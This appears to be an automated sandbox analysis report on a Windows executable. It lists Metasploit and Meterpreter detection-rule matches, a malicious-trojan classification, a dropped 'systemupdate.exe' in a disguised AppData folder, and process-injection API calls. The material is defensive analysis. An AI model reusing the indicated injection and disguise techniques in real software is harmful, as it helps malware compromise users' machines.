      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F997210 appears 120 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F983880 appears 65 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F983BD0 appears 40 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F998250 appears 300 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F8BEB00 appears 35 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F9973B0 appears 140 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F97FEE0 appears 35 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F9975A0 appears 35 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F9981B0 appears 415 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F8B3490 appears 55 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F8BBD70 appears 35 times
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: String function: 00007FF75F8CAED0 appears 35 times
      Source: antietat[1].exe.0.drStatic PE information: Number of sections : 11 > 10
      Source: sNifdpWiY9.exeStatic PE information: Number of sections : 20 > 10
      Source: systemupdate.exe.0.drStatic PE information: Number of sections : 11 > 10
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
      Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a3d0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
      Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a410000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a6736a0.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 9.2.systemupdate.exe.1de4a3d4000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
      Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
      Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000009.00000002.2494352245.000001DE4A43D000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
      Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000009.00000002.2494768618.000001DE4A640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000009.00000002.2494296675.000001DE4A433000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
      Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
      Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
      Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
      Source: 00000009.00000002.2494041747.000001DE4A3D4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_Meterpreter author = ditekSHen, description = Detects Meterpreter payload
      Source: classification engineClassification label: mal92.troj.evad.winEXE@13/8@1/2
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A419E60 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,9_2_000001DE4A419E60
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeCode function: 9_2_000001DE4A411F34 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,GetLastError,CreateEventW,GetCurrentProcess,DuplicateHandle,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,free,GetLastError,free,CloseHandle,CloseHandle,9_2_000001DE4A411F34
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeCode function: 0_2_00007FF75F8C0D00 GetFileType,GetFileSizeEx,SetFilePointer,SetEndOfFile,_lseeki64,GetFileInformationByHandle,calloc,calloc,FindFirstVolumeW,GetVolumeInformationW,FindNextVolumeW,FindNextVolumeW,GetVolumeInformationW,FindVolumeClose,free,GetDiskFreeSpaceExW,free,FindVolumeClose,free,_errno,GetLastError,_errno,_errno,0_2_00007FF75F8C0D00
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeFile created: C:\Users\user\AppData\Roaming\SystemCacheJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2384:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:508:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1264:120:WilError_03
      Source: sNifdpWiY9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeFile read: C:\Users\user\Desktop\sNifdpWiY9.exe:Zone.IdentifierJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\sNifdpWiY9.exe "C:\Users\user\Desktop\sNifdpWiY9.exe"
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeProcess created: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\google.bin
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\Desktop\sNifdpWiY9.exe "C:\Users\user\Desktop\sNifdpWiY9.exe"
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeProcess created: C:\Users\user\Desktop\sNifdpWiY9.exe "C:\Users\user\Desktop\sNifdpWiY9.exe"
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Users\user\Desktop\sNifdpWiY9.exe "C:\Users\user\Desktop\sNifdpWiY9.exe"
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeProcess created: C:\Users\user\Desktop\sNifdpWiY9.exe "C:\Users\user\Desktop\sNifdpWiY9.exe"
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeProcess created: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exe C:\Users\user\AppData\Roaming\SystemCache\google.binJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\AppData\Roaming\SystemCache\systemupdate.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: pcacli.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\sNifdpWiY9.exeSection loaded: iertutil.dllJump to behavior
